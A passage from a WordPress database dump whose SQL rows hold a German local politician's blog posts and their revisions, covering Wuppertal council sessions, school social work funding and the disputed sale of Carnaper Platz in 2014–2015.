durch Einsparungen im Haushalt fortgeführt werden kann.http://www.spdrat.de/SpdPress/read/1077\r\nZu der Mitteilung muss richtig gestellt werden, dass die kleineren Parteien im Rat den Haushaltssanierungsplan abgelehnt haben, weil die Schulsozialarbeit dort nicht erwähnt wird. Hätte die Kooperation in der Ratssitzung bereits die heutige Mitteilung gemacht, wäre die Abstimmung mit Sicherheit anders ausgefallen. \r\nDa es mir in erster Linie um die Sache geht, begrüsse ich die heutige Entscheidung sehr, stelle aber schonmal die Frage nach der Finanzierung über 2015 hinaus.\r\nDie Schulsozialarbeiter wochenlang zappeln zu lassen und sich dann mediengeil als Retter der Schulsozialarbeit aufzuspielen halte ich für äusserst schlechten Stil.\r\nÜbrigens habe ich weder Müller noch Reese auf der Demo zum Erhalt der Schulsozialarbeit gesehen.\r\n','Schulsozialarbeit','','inherit','open','open','','18-revision-v1','','','2014-11-13 22:06:53','2014-11-13 21:06:53','',18,'http://www.ollital.de/wordpress/?p=26',0,'revision','',0),(27,2,'2014-11-13 22:07:23','2014-11-13 21:07:23','Nachdem sich die CDU in der letzten Ratssitzung sich überraschend für den Erhalt der Schulsozialarbeit ausaprach, gaben CDU und SPD in einer gemeinsamen Pressemitteilung bekannt, dass die Schulsozialarbeit im Jahr 2015 durch Einsparungen im Haushalt fortgeführt werden kann.http://www.spdrat.de/SpdPress/read/1077\r\nZu der Mitteilung muss richtig gestellt werden, dass die kleineren Parteien im Rat den Haushaltssanierungsplan abgelehnt haben, weil die Schulsozialarbeit dort nicht erwähnt wird. Hätte die Kooperation in der Ratssitzung bereits die heutige Mitteilung gemacht, wäre die Abstimmung mit Sicherheit anders ausgefallen. \r\nDa es mir in erster Linie um die Sache geht, begrüsse ich die heutige Entscheidung sehr, stelle aber schonmal die Frage nach der Finanzierung über 2015 hinaus.\r\nDie Schulsozialarbeiter wochenlang zappeln zu lassen und sich dann mediengeil als Retter der Schulsozialarbeit aufzuspielen halte ich für äusserst schlechten Stil.\r\nÜbrigens habe ich weder Müller noch Reese auf der Demo zum Erhalt der Schulsozialarbeit gesehen.\r\n','Schulsozialarbeit','','inherit','open','open','','18-revision-v1','','','2014-11-13 22:07:23','2014-11-13 21:07:23','',18,'http://www.ollital.de/wordpress/?p=27',0,'revision','',0),(28,2,'2014-11-13 22:07:58','2014-11-13 21:07:58','Nachdem sich die CDU in der letzten Ratssitzung sich überraschend für den Erhalt der Schulsozialarbeit ausaprach, gaben CDU und SPD in einer gemeinsamen Pressemitteilung bekannt, dass die Schulsozialarbeit im Jahr 2015 durch Einsparungen im Haushalt fortgeführt werden kann.http://www.spdrat.de/SpdPress/read/1077\r\nZu der Mitteilung muss richtig gestellt werden, dass die kleineren Parteien im Rat den Haushaltssanierungsplan abgelehnt haben, weil die Schulsozialarbeit dort nicht erwähnt wird. Hätte die Kooperation in der Ratssitzung bereits die heutige Mitteilung gemacht, wäre die Abstimmung mit Sicherheit anders ausgefallen. \r\nDa es mir in erster Linie um die Sache geht, begrüsse ich die heutige Entscheidung sehr, stelle aber schonmal die Frage nach der Finanzierung über 2015 hinaus.\r\nDie Schulsozialarbeiter wochenlang zappeln zu lassen und sich dann mediengeil als Retter der Schulsozialarbeit aufzuspielen halte ich für äusserst schlechten Stil.\r\nÜbrigens habe ich weder Müller noch Reese auf der Demo zum Erhalt der Schulsozialarbeit gesehen.\r\n','Schulsozialarbeit','','inherit','open','open','','18-revision-v1','','','2014-11-13 22:07:58','2014-11-13 21:07:58','',18,'http://www.ollital.de/wordpress/?p=28',0,'revision','',0),(29,2,'2014-11-14 07:06:27','2014-11-14 06:06:27','Nachdem sich die CDU in der letzten Ratssitzung sich überraschend für den Erhalt der Schulsozialarbeit ausaprach, gaben CDU und SPD in einer gemeinsamen Pressemitteilung bekannt, dass die Schulsozialarbeit im Jahr 2015 durch Einsparungen im Haushalt fortgeführt werden kann.http://www.spdrat.de/SpdPress/read/1077\r\nZu der Mitteilung muss richtig gestellt werden, dass die kleineren Parteien im Rat den Haushaltssanierungsplan abgelehnt haben, weil die Schulsozialarbeit dort nicht erwähnt wird. Hätte die Kooperation in der Ratssitzung bereits die heutige Mitteilung gemacht, wäre die Abstimmung mit Sicherheit anders ausgefallen. \r\nDa es mir in erster Linie um die Sache geht, begrüsse ich die heutige Entscheidung sehr, stelle aber schonmal die Frage nach der Finanzierung über 2015 hinaus.\r\nDie Schulsozialarbeiter wochenlang zappeln zu lassen und sich dann mediengeil als Retter der Schulsozialarbeit aufzuspielen halte ich für äusserst schlechten Stil.\r\nÜbrigens habe ich weder Müller noch Reese auf der Demo zum Erhalt der Schulsozialarbeit gesehen.\r\n','Schulsozialarbeit','','inherit','open','open','','18-revision-v1','','','2014-11-14 07:06:27','2014-11-14 06:06:27','',18,'http://www.ollital.de/wordpress/?p=29',0,'revision','',0),(30,2,'2014-11-14 07:21:21','2014-11-14 06:21:21','Nachdem sich die CDU in der letzten Ratssitzung sich überraschend für den Erhalt der Schulsozialarbeit ausaprach, gaben CDU und SPD in einer gemeinsamen Pressemitteilung bekannt, dass die Schulsozialarbeit im Jahr 2015 durch Einsparungen im Haushalt fortgeführt werden kann.\r\nZu der Mitteilung muss richtig gestellt werden, dass die kleineren Parteien im Rat den Haushaltssanierungsplan abgelehnt haben, weil die Schulsozialarbeit dort nicht erwähnt wird. Hätte die Kooperation in der Ratssitzung bereits die heutige Mitteilung gemacht, wäre die Abstimmung mit Sicherheit anders ausgefallen. \r\nDa es mir in erster Linie um die Sache geht, begrüsse ich die heutige Entscheidung sehr, stelle aber schonmal die Frage nach der Finanzierung über 2015 hinaus.\r\nDie Schulsozialarbeiter wochenlang zappeln zu lassen und sich dann mediengeil als Retter der Schulsozialarbeit aufzuspielen halte ich für äusserst schlechten Stil.\r\nÜbrigens habe ich weder Müller noch Reese auf der Demo zum Erhalt der Schulsozialarbeit gesehen.\r\n','Schulsozialarbeit','','inherit','open','open','','18-revision-v1','','','2014-11-14 07:21:21','2014-11-14 06:21:21','',18,'http://www.ollital.de/wordpress/?p=30',0,'revision','',0),(33,2,'2014-11-14 13:12:55','2014-11-14 12:12:55','Nachdem sich die CDU in der letzten Ratssitzung sich überraschend für den Erhalt der Schulsozialarbeit aussprach, gaben CDU und SPD in einer gemeinsamen Pressemitteilung bekannt, dass die Schulsozialarbeit im Jahr 2015 durch Einsparungen im Haushalt fortgeführt werden kann.\r\nZu der Mitteilung muss richtig gestellt werden, dass die kleineren Parteien im Rat den Haushaltssanierungsplan abgelehnt haben, weil die Schulsozialarbeit dort nicht erwähnt wird. Hätte die Kooperation in der Ratssitzung bereits die heutige Mitteilung gemacht, wäre die Abstimmung mit Sicherheit anders ausgefallen. \r\nDa es mir in erster Linie um die Sache geht, begrüsse ich die heutige Entscheidung sehr, stelle aber schonmal die Frage nach der Finanzierung über 2015 hinaus.\r\nDie Schulsozialarbeiter wochenlang zappeln zu lassen und sich dann mediengeil als Retter der Schulsozialarbeit aufzuspielen halte ich für äusserst schlechten Stil.\r\nÜbrigens habe ich weder Müller noch Reese auf der Demo zum Erhalt der Schulsozialarbeit gesehen.\r\n','Schulsozialarbeit','','inherit','open','open','','18-revision-v1','','','2014-11-14 13:12:55','2014-11-14 12:12:55','',18,'http://www.ollital.de/wordpress/?p=33',0,'revision','',0),(35,2,'2014-11-24 09:34:40','2014-11-24 08:34:40','Auf der Kreismitgliederversammlung am 23.11.2014 haben die Wuppertaler Piraten turnusgemäß ihre Büropiraten neu gewählt.\r\nDas neue Büropiratenteam besteht aus\r\n
                                                                  \r\n
                                                                • Stefan Kottas
                                                                • \r\n
                                                                • Franz Rudolf Büning
                                                                • \r\n
                                                                • Jonathan Benedikt Hütter
                                                                • \r\n
                                                                • und Ralph Urban
                                                                • \r\n
                                                                \r\n\r\nAlle Kandidaten wurden im ersten Wahlgang gewählt. Ich freue mich auf die Zusammenarbeit während des nächsten Jahres.\r\n\r\nDesweiteren wurden einige Anträge beschlossen, dass wir verschiedene Aktionen (Carnaper Platz, TTIP u.ä.) aktiv unterstützen werden.\r\n','Kreismitgliederversammlung 2014.3','','publish','open','open','','kreismitgliederversammlung-2014-3','','','2014-11-25 11:19:14','2014-11-25 10:19:14','',0,'http://www.ollital.de/wordpress/?p=35',0,'post','',0),(36,2,'2014-11-24 09:33:57','2014-11-24 08:33:57','Auf der Kreismitgliederversammlung 2014.3 am 23.11.2014 haben die Wuppertaler Piraten turnusgemäß ihre Büropiraten neu gewählt.\r\nDas neue Büropiratenteam besteht aus\r\n
                                                                  \r\n
                                                                • Stefan Kottas
                                                                • \r\n
                                                                • Franz Rudolf Büning
                                                                • \r\n
                                                                • Jonathan Benedikt Hütter
                                                                • \r\n
                                                                • und Ralph Urban
                                                                • \r\n
                                                                \r\n\r\nAlle Kandidaten wurden im ersten Wahlgang gewählt. Ich freue mich auf die Zusammenarbeit im nächsten Jahr.\r\n\r\nDesweiteren wurden einige Anträge beschlossen, dass wir verschiedene Aktionen (Carnaper Platz, TTIP u.ä.) aktiv unterstützen.\r\n','Kreismitgliederversammlung 2014.3','','inherit','open','open','','35-revision-v1','','','2014-11-24 09:33:57','2014-11-24 08:33:57','',35,'http://www.ollital.de/wordpress/?p=36',0,'revision','',0),(37,2,'2014-11-25 09:11:36','2014-11-25 08:11:36','Auf der Kreismitgliederversammlung 2014.3 am 23.11.2014 haben die Wuppertaler Piraten turnusgemäß ihre Büropiraten neu gewählt.\r\nDas neue Büropiratenteam besteht aus\r\n
                                                                  \r\n
                                                                • Stefan Kottas
                                                                • \r\n
                                                                • Franz Rudolf Büning
                                                                • \r\n
                                                                • Jonathan Benedikt Hütter
                                                                • \r\n
                                                                • und Ralph Urban
                                                                • \r\n
                                                                \r\n\r\nAlle Kandidaten wurden im ersten Wahlgang gewählt. Ich freue mich auf die Zusammenarbeit im nächsten Jahr.\r\n\r\nDesweiteren wurden einige Anträge beschlossen, dass wir verschiedene Aktionen (Carnaper Platz, TTIP u.ä.) aktiv unterstützen werden.\r\n','Kreismitgliederversammlung 2014.3','','inherit','open','open','','35-revision-v1','','','2014-11-25 09:11:36','2014-11-25 08:11:36','',35,'http://www.ollital.de/wordpress/?p=37',0,'revision','',0),(38,2,'2014-11-25 11:18:38','2014-11-25 10:18:38','Auf der Kreismitgliederversammlung am 23.11.2014 haben die Wuppertaler Piraten turnusgemäß ihre Büropiraten neu gewählt.\r\nDas neue Büropiratenteam besteht aus\r\n
                                                                  \r\n
                                                                • Stefan Kottas
                                                                • \r\n
                                                                • Franz Rudolf Büning
                                                                • \r\n
                                                                • Jonathan Benedikt Hütter
                                                                • \r\n
                                                                • und Ralph Urban
                                                                • \r\n
                                                                \r\n\r\nAlle Kandidaten wurden im ersten Wahlgang gewählt. Ich freue mich auf die Zusammenarbeit im nächsten Jahr.\r\n\r\nDesweiteren wurden einige Anträge beschlossen, dass wir verschiedene Aktionen (Carnaper Platz, TTIP u.ä.) aktiv unterstützen werden.\r\n','Kreismitgliederversammlung 2014.3','','inherit','open','open','','35-revision-v1','','','2014-11-25 11:18:38','2014-11-25 10:18:38','',35,'http://www.ollital.de/wordpress/?p=38',0,'revision','',0),(39,2,'2014-11-25 11:19:14','2014-11-25 10:19:14','Auf der Kreismitgliederversammlung am 23.11.2014 haben die Wuppertaler Piraten turnusgemäß ihre Büropiraten neu gewählt.\r\nDas neue Büropiratenteam besteht aus\r\n
                                                                  \r\n
                                                                • Stefan Kottas
                                                                • \r\n
                                                                • Franz Rudolf Büning
                                                                • \r\n
                                                                • Jonathan Benedikt Hütter
                                                                • \r\n
                                                                • und Ralph Urban
                                                                • \r\n
                                                                \r\n\r\nAlle Kandidaten wurden im ersten Wahlgang gewählt. Ich freue mich auf die Zusammenarbeit während des nächsten Jahres.\r\n\r\nDesweiteren wurden einige Anträge beschlossen, dass wir verschiedene Aktionen (Carnaper Platz, TTIP u.ä.) aktiv unterstützen werden.\r\n','Kreismitgliederversammlung 2014.3','','inherit','open','open','','35-revision-v1','','','2014-11-25 11:19:14','2014-11-25 10:19:14','',35,'http://www.ollital.de/wordpress/?p=39',0,'revision','',0),(41,2,'2014-11-26 22:35:55','2014-11-26 21:35:55','Die heutige Ausschusssitzung wurde von der Diskussion um die Beschlussvorlage zum Verkauf des Carnaper Platzes dominiert. Durch einen Zusatzantrag seitens der SPD wurde der darin enthaltene Mitverkauf eines Stücks der Bromberger Str. aus der Vorlage gestrichen.\r\nAuf meine Frage, welche Alternativen geprüft wurden und warum sie nicht in Frage kommen, wurde mir mitgeteilt, dass lediglich ein Neubau auf dem bisherigen Gelände der WSW in Erwägung gezogen wurde. Dort ist ein Bauen wegen der angeblich vielfachen Versorgungsleitungen nicht möglich, außerdem müsste für viel Geld das bergische Wasserlabor an einen anderen Standort verlagert werden, das auf jeden Fall erhalten werden muss.\r\nNach einer sehr lebhaften Diskussion wurde dem Verkauf danngegen die Stimmen der Oppositionsparteien zugestimmt. Der Rat entscheidet am 15.12. in seiner Sitzung über diese Beschlussvorlage.\r\n','Ausschuss für Stadtentwicklung, Wirtschaft und Bauen','','publish','open','open','','ausschuss-fur-stadtentwicklung-wirtschaft-und-bauen','','','2014-12-07 17:03:26','2014-12-07 16:03:26','',0,'http://www.ollital.de/wordpress/?p=41',0,'post','',0),(42,2,'2014-11-26 22:35:14','2014-11-26 21:35:14','Die heutige Ausschusssitzung wurde von der Diskussion um die Beschlussvorlage zum Verkauf des Carnaper Platzes dominiert. Durch einen Zusatzantrag seitens der SPD wurde der darin enthaltene Mitverkauf eines Stücks der Bromberger Str. aus der Vorlage gestrichen.\r\nAuf meine Frage, welche Alternativen geprüft wurden und warum sie nicht in Frage kommen, wurde mir mitgteilt, dass lediglich der Neubau auf dem bisherigen Gelände der WSW in Erwägung gezogen wurde. Dort ist ein Bauen wegen der angeblich vielfachen Versorgungsleitungen nicht möglich, außerdem müsste für viel Geld das bergische Wasserlabor an einen anderen Standort verlagert werden, das auf jeden Fall erhalten werden muss.\r\nNach einer sehr lebhaften Diskussion wurde dem Verkauf danngegen die Stimmen der Oppositionsparteien zugestimmt. Der Rat entscheidet am 15.12. in seiner Sitzung über diese Beschlussvorlage.\r\n','Ausschuss für Stadtentwicklung, Wirtschaft und Bauen','','inherit','open','open','','41-revision-v1','','','2014-11-26 22:35:14','2014-11-26 21:35:14','',41,'http://www.ollital.de/wordpress/?p=42',0,'revision','',0),(43,2,'2014-11-26 22:41:43','2014-11-26 21:41:43','Heute abend versammelten sich ca. 160 Menschen in der Rotter Kirche, um das Bürgerbegehren gegen den Verkauf des Carnaper Platzes zu iniitieren.\r\nDer grösste Teil der Anwesenden war aus dem gesamten Wuppertaler Stadtgebiet angereist, was zeigt, dass der Platz ein Wuppertaler und nicht nur Rotter oder Barmer Thema ist.\r\nInhaltlich wurde heute in erster Linie die Formalien und rechtlichen Rahmenbedingungen für das Begehren erläutert.\r\nAußerdem wurde ganz klar gestellt, dass es hier nur gegen den Verkauf des Grundstücks geht und nicht gegen einen Neubau der WSW Hauptverwaltung.\r\n','Bürgerbegehren gegen den Verkauf des Carnaper Platzes','','publish','open','open','','burgerbegehren-gegen-den-verkauf-des-carnaper-platzes','','','2014-11-27 14:39:04','2014-11-27 13:39:04','',0,'http://www.ollital.de/wordpress/?p=43',0,'post','',0),(44,2,'2014-11-26 22:41:32','2014-11-26 21:41:32','Heute abend versammelten sich ca. 170 Menschen in der Rotter Kirche, um das Bürgerbegehren gegen den Verkauf des Carnaper Platzes zu iniitieren.\r\nDer grösste Teil der Anwesenden war aus dem gesamten Wuppertaler Stadtgebiet angereist, was zeigt, dass der Platz ein Wuppertaler und nicht nur Rotter oder Barmer Thema ist.\r\nInhaltlich wurde heute in erster Linie die Formalien und rechtlichen Rahmenbedingungen für das Begehren erläutert.\r\nAußerdem wurde ganz klar gestellt, dass es hier nur gegen den Verkauf des Grundstücks geht und nicht gegen einen Neubau der WSW Hauptverwaltung.\r\n','Bürgerbegehren gegen den Verkauf des Carnaper Platzes','','inherit','open','open','','43-revision-v1','','','2014-11-26 22:41:32','2014-11-26 21:41:32','',43,'http://www.ollital.de/wordpress/?p=44',0,'revision','',0),(45,2,'2014-11-27 07:43:24','2014-11-27 06:43:24','Heute abend versammelten sich ca. 160+ Menschen in der Rotter Kirche, um das Bürgerbegehren gegen den Verkauf des Carnaper Platzes zu iniitieren.\r\nDer grösste Teil der Anwesenden war aus dem gesamten Wuppertaler Stadtgebiet angereist, was zeigt, dass der Platz ein Wuppertaler und nicht nur Rotter oder Barmer Thema ist.\r\nInhaltlich wurde heute in erster Linie die Formalien und rechtlichen Rahmenbedingungen für das Begehren erläutert.\r\nAußerdem wurde ganz klar gestellt, dass es hier nur gegen den Verkauf des Grundstücks geht und nicht gegen einen Neubau der WSW Hauptverwaltung.\r\n','Bürgerbegehren gegen den Verkauf des Carnaper Platzes','','inherit','open','open','','43-revision-v1','','','2014-11-27 07:43:24','2014-11-27 06:43:24','',43,'http://www.ollital.de/wordpress/?p=45',0,'revision','',0),(46,2,'2014-11-27 14:39:04','2014-11-27 13:39:04','Heute abend versammelten sich ca. 160 Menschen in der Rotter Kirche, um das Bürgerbegehren gegen den Verkauf des Carnaper Platzes zu iniitieren.\r\nDer grösste Teil der Anwesenden war aus dem gesamten Wuppertaler Stadtgebiet angereist, was zeigt, dass der Platz ein Wuppertaler und nicht nur Rotter oder Barmer Thema ist.\r\nInhaltlich wurde heute in erster Linie die Formalien und rechtlichen Rahmenbedingungen für das Begehren erläutert.\r\nAußerdem wurde ganz klar gestellt, dass es hier nur gegen den Verkauf des Grundstücks geht und nicht gegen einen Neubau der WSW Hauptverwaltung.\r\n','Bürgerbegehren gegen den Verkauf des Carnaper Platzes','','inherit','open','open','','43-revision-v1','','','2014-11-27 14:39:04','2014-11-27 13:39:04','',43,'http://www.ollital.de/wordpress/?p=46',0,'revision','',0),(47,2,'2014-12-01 11:29:19','2014-12-01 10:29:19','Ohne Anspruch auf Vollständigkeit:\r\n\r\nDas Rats-TV ist nach der Testphase in seinen Regelbetrieb übergegangen. Die Realisierung übernimmt nach Ausschreibung eine Firma aus Kassel.\r\n\r\nDer OB kündigt eine Überarbeitung der Hauptsatzung an, die den Wegfall der 5% Hürde berücksichtigt.\r\n\r\nDie 4. Fortschreibung des Haushaltsanierungsplans wurde beschlossen.\r\n\r\nDie Errichtung einer Bergischen Mehrzweckhalle wurde auf den Weg gebracht.\r\n\r\nStadtdirektor Meyer bekräftigt seine Aussage aus dem StaWiBau Ausschuss, dass eine Verlagerung des AZ nicht auf der Agenda steht.\r\n\r\nDas Berufskolleg Kothen wird zum 31.07.2015 als eigenständiges Berufskolleg aufgelöst.\r\n\r\nDer Beschluss über die bergische Zusammenarbeit wird auf die Dezembersitzung vertagt, da die Solinger noch Beratungsbedarf haben.\r\n\r\nBeim Redebeitrag von Gerd Wöll (Pro NRW) verließ beinah die komplette SPD-Fraktion den Saal.\r\n\r\n\r\n\r\n','Ratssitzung 10.11.2014','','inherit','open','open','','10-revision-v1','','','2014-12-01 11:29:19','2014-12-01 10:29:19','',10,'http://www.ollital.de/wordpress/?p=47',0,'revision','',0),(49,2,'2014-12-07 17:03:26','2014-12-07 16:03:26','Die heutige Ausschusssitzung wurde von der Diskussion um die Beschlussvorlage zum Verkauf des Carnaper Platzes dominiert. Durch einen Zusatzantrag seitens der SPD wurde der darin enthaltene Mitverkauf eines Stücks der Bromberger Str. aus der Vorlage gestrichen.\r\nAuf meine Frage, welche Alternativen geprüft wurden und warum sie nicht in Frage kommen, wurde mir mitgeteilt, dass lediglich ein Neubau auf dem bisherigen Gelände der WSW in Erwägung gezogen wurde. Dort ist ein Bauen wegen der angeblich vielfachen Versorgungsleitungen nicht möglich, außerdem müsste für viel Geld das bergische Wasserlabor an einen anderen Standort verlagert werden, das auf jeden Fall erhalten werden muss.\r\nNach einer sehr lebhaften Diskussion wurde dem Verkauf danngegen die Stimmen der Oppositionsparteien zugestimmt. Der Rat entscheidet am 15.12. in seiner Sitzung über diese Beschlussvorlage.\r\n','Ausschuss für Stadtentwicklung, Wirtschaft und Bauen','','inherit','open','open','','41-revision-v1','','','2014-12-07 17:03:26','2014-12-07 16:03:26','',41,'http://www.ollital.de/wordpress/?p=49',0,'revision','',0),(51,2,'2014-12-15 22:13:11','2014-12-15 21:13:11','Das übergreifende Thema dieser Ratssitzung war die Beschlussvorlage zum Verkauf des Carnaper Platzes. Nach dreistündiger Diskussion wurde in geheimer Abstimmung dem Verkauf mit 34 zu 30 Stimmen zugestimmt.\r\nLeider wurde hier wieder mal gegen den Willen der Wuppertaler Bürger entschieden, die sich jetzt in einem Bürgerbegehren gegen den Buschluss formieren werden. Unterschriftenlisten werden in Kürze bereitstehen.\r\nDie Nordbahntrasse wird am Freitag durch den heutigen Dringlichkeitsbeschluss als Dr.-Werner-Jackstädt Weg eröffnet werden. Ich vermute, der Wuppertaler wird weiterhin Nordbahntrasse sagen.\r\n','Ratssitzung vom 15.12.2014','','publish','open','open','','ratssitzung-vom-15-12-2014','','','2014-12-16 11:55:37','2014-12-16 10:55:37','',0,'http://www.ollital.de/wordpress/?p=51',0,'post','',0),(52,2,'2014-12-15 22:13:11','2014-12-15 21:13:11','Das übergreifende Thema dieser Ratssitzung war die Beschlussvorlage zum Verkauf des Carnaper Platzes. Nach dreistündiger Diskussion wurde in geheimer Abstimmung dem Verkauf mit 34 zu 30 Stimmen zugestimmt.\r\nLeider wurde hier wieder gegen den Willen der Wuppertaler Bürger entschieden, die sich jetzt in einem Bürgerbegehren gegen den Buschluss formieren werden. Unterschriftenlisten wrrden in Kürze im Piratenbüro ausliegen.\r\nDie Nordbahntrasse wird am Freitag durch den heutigen Beschluss als Dr.-Werner-Jackstädt Weg eröffnet werden. Ich vermute, der Wuppertaler wird weiterhin Nordbahntrasse sagen.\r\n','Ratssitzung vom 15.12.2014','','inherit','open','open','','51-revision-v1','','','2014-12-15 22:13:11','2014-12-15 21:13:11','',51,'http://www.ollital.de/wordpress/?p=52',0,'revision','',0),(53,2,'2014-12-16 11:54:47','2014-12-16 10:54:47','Das übergreifende Thema dieser Ratssitzung war die Beschlussvorlage zum Verkauf des Carnaper Platzes. Nach dreistündiger Diskussion wurde in geheimer Abstimmung dem Verkauf mit 34 zu 30 Stimmen zugestimmt.\r\nLeider wurde hier wieder gegen den Willen der Wuppertaler Bürger entschieden, die sich jetzt in einem Bürgerbegehren gegen den Buschluss formieren werden. Unterschriftenlisten werden in Kürze bereitstehen.\r\nDie Nordbahntrasse wird am Freitag durch den heutigen Beschluss als Dr.-Werner-Jackstädt Weg eröffnet werden. Ich vermute, der Wuppertaler wird weiterhin Nordbahntrasse sagen.\r\n','Ratssitzung vom 15.12.2014','','inherit','open','open','','51-revision-v1','','','2014-12-16 11:54:47','2014-12-16 10:54:47','',51,'http://www.ollital.de/wordpress/?p=53',0,'revision','',0),(54,2,'2014-12-16 11:55:37','2014-12-16 10:55:37','Das übergreifende Thema dieser Ratssitzung war die Beschlussvorlage zum Verkauf des Carnaper Platzes. Nach dreistündiger Diskussion wurde in geheimer Abstimmung dem Verkauf mit 34 zu 30 Stimmen zugestimmt.\r\nLeider wurde hier wieder mal gegen den Willen der Wuppertaler Bürger entschieden, die sich jetzt in einem Bürgerbegehren gegen den Buschluss formieren werden. Unterschriftenlisten werden in Kürze bereitstehen.\r\nDie Nordbahntrasse wird am Freitag durch den heutigen Dringlichkeitsbeschluss als Dr.-Werner-Jackstädt Weg eröffnet werden. Ich vermute, der Wuppertaler wird weiterhin Nordbahntrasse sagen.\r\n','Ratssitzung vom 15.12.2014','','inherit','open','open','','51-revision-v1','','','2014-12-16 11:55:37','2014-12-16 10:55:37','',51,'http://www.ollital.de/wordpress/?p=54',0,'revision','',0),(59,2,'2015-01-20 11:35:20','2015-01-20 10:35:20','Nach einem halben Jahr als Hospitant in der Ratsfraktion von Bündnis 90 / Die Grünen habe ich, wie vereinbart, letzten Mittwoch ein Gespräch mit den Fraktionsvorsitzenden geführt, in dem es um die Bewertung der bisherigen Zusammenarbeit und die Optionen für eine weitere Kooperation\r\nging. Unser gegenseitiges Fazit fiel deutlich positiv aus und mir wurde die ordentliche Mitgliedschaft in der Fraktion angeboten.\r\nDieses Angebot habe ich angenommen und in der Fraktionssitzung am 19.01.2015 wurde ich einstimmig in die Fraktion gewählt.\r\nIch freue mich sehr über dieses Vertrauen und bin gespannt auf die Zusammenarbeit in den nächsten Jahren.\r\n','ordentliches Fraktionsmitglied','','publish','open','open','','ordentliches-fraktionsmitglied','','','2015-01-20 11:35:20','2015-01-20 10:35:20','',0,'http://www.ollital.de/wordpress/?p=59',0,'post','',0),(60,2,'2015-01-20 11:34:45','2015-01-20 10:34:45','Nach einem halben Jahr als Hospitant in der Ratsfraktion von Bündnis 90 / Die Grünen habe ich, wie vereinbart, letzten Mittwoch ein\r\nGespräch mit den Fraktionsvorsitzenden geführt, in dem es um die Bewertung der bisherigen Zusammenarbeit und die Optionen für eine weitere Kooperation\r\nging. Unser gegenseitiges Fazit fiel deutlich positiv aus und mir wurde die ordentliche Mitgliedschaft in der Fraktion angeboten.\r\nDieses Angebot habe ich angenommen und in der Fraktionssitzung am 19.01.2015 wurde ich einstimmig in die Fraktion gewählt.\r\nIch freue mich sehr über dieses Vertrauen und bin gespannt auf die Zusammenarbeit in den nächsten Jahren.\r\n','ordentliches Fraktionsmitglied','','inherit','open','open','','59-revision-v1','','','2015-01-20 11:34:45','2015-01-20 10:34:45','',59,'http://www.ollital.de/wordpress/?p=60',0,'revision','',0),(61,2,'2015-01-20 11:35:20','2015-01-20 10:35:20','Nach einem halben Jahr als Hospitant in der Ratsfraktion von Bündnis 90 / Die Grünen habe ich, wie vereinbart, letzten Mittwoch ein Gespräch mit den Fraktionsvorsitzenden geführt, in dem es um die Bewertung der bisherigen Zusammenarbeit und die Optionen für eine weitere Kooperation\r\nging. Unser gegenseitiges Fazit fiel deutlich positiv aus und mir wurde die ordentliche Mitgliedschaft in der Fraktion angeboten.\r\nDieses Angebot habe ich angenommen und in der Fraktionssitzung am 19.01.2015 wurde ich einstimmig in die Fraktion gewählt.\r\nIch freue mich sehr über dieses Vertrauen und bin gespannt auf die Zusammenarbeit in den nächsten Jahren.\r\n','ordentliches Fraktionsmitglied','','inherit','open','open','','59-revision-v1','','','2015-01-20 11:35:20','2015-01-20 10:35:20','',59,'http://www.ollital.de/wordpress/?p=61',0,'revision','',0),(62,2,'2015-01-28 10:35:32','2015-01-28 09:35:32','Gestern wurde gemeldet, dass Wuppertaler Stadtwerke AG auf einen Neubau der Konzernzentrale auf dem Carnaper Platz verzichtet.\r\nDies ist aus Sicht der Bürgerbeteiligung eine sehr gute Information und ein toller Erfolg des Rotter Bürgervereins, der durch das angekündigte Bürgerbegehren\r\ngegen den Verkauf des Platzes den notwendigen Druck gegen die Pläne aufrecht erhalten hat.\r\nDie WSW müssen jetzt meiner Meinung nach trotzdem schnellstens eine Lösung finden, um seine Mitarbeiter aus den PCB belasteten Gebäuden umzuquartieren.\r\n\r\nDie Frage, die sich mir aufwirft: In der Rats- und Auschussdebatte um den Platzverkauf, wurde der Carnaper Platz immer als alternativlos dargestellt, da wegen der\r\nVersorgungs-und Steuerleitungen, die in die bisherigen Gebäude reinlaufen, kein anderer Platz möglich wäre.\r\nWurde mit diesem jetzt scheinbar hinfälligen Argument der Rat bewusst getäuscht?\r\n','WSW verzichtet auf Neubau','','publish','open','open','','wsw-verzichtet-auf-neubau','','','2015-01-28 10:35:32','2015-01-28 09:35:32','',0,'http://www.ollital.de/wordpress/?p=62',0,'post','',0),(63,2,'2015-01-28 10:33:23','2015-01-28 09:33:23','Gestern wurde gemeldet, dass Wuppertaler Stadtwerke AG auf einen Neubau der Konzernzentrale auf dem Carnaper Platz verzichtet.\r\nDies ist aus Sicht der Bürgerbeteiligung eine sehr gute Information und ein toller Erfolg des Rotter Bürgervereins, der durch das angekündigte Bürgerbegehren\r\ngegen den Verkauf des Platzes den notwendigen Druck gegen die Pläne aufrecht erhalten hat.\r\nDie WSW müssen jetzt meiner Meinung nach trotzdem schnellstens eine Lösung finden, um seine Mitarbeiter aus den PCB belasteten Gebäuden umzuquartieren.\r\n\r\nDie Frage, die sich mir aufwirft: In der Rats- und Auschussdebatte um den Platzverkauf, wurde der Carnaper Platz immer als alternativlos dargestellt, da wegen der\r\nVersorgungs-und Steuerleitungen, die in die bisherigen Gebäude reinlaufen, kein anderer Platz möglich wäre.\r\nWurde mit diesem jetzt scheinbar hinfälligen Argument der Rat bewusst getäuscht?\r\n','WSW verzichtet auf Neubau','','inherit','open','open','','62-revision-v1','','','2015-01-28 10:33:23','2015-01-28 09:33:23','',62,'http://www.ollital.de/wordpress/?p=63',0,'revision','',0),(66,2,'2015-02-05 07:58:23','2015-02-05 06:58:23','Da ich als Einzelkämpfer im Rat nicht viel reißen kann, habe ich direkt nach der Wahl Gespräche mit den meisten demokratischen Fraktionen geführt, um eine Zusammenarbeit einzufädeln. Da ich in den Wahlprogrammen von Piraten und Grünen die größte Schnittmenge fand, habe ich seit Juni 2014 dort hospitiert.\r\nMit einem einstimmigen Votum in der Fraktionssitzung vom 19.01.2015 wurde ich zum ordentlichen Mitglied der Fraktion von BÜNDNIS 90/ Die Grünen gewählt.\r\nAm 04.02.2015 hat auch Oberbürgermeister Peter Jung diesem zugestimmt.\r\nDamit hab ich es auch in die Presse geschafft.\r\nIch bin überwältigt von diesem und dankbar für dieses Ergebnis. Es ermöglicht mir eine sehr intensivere Zusammenarbeit und eröffnet mir bessere Möglichkeiten für die Ratsarbeit der kommenden 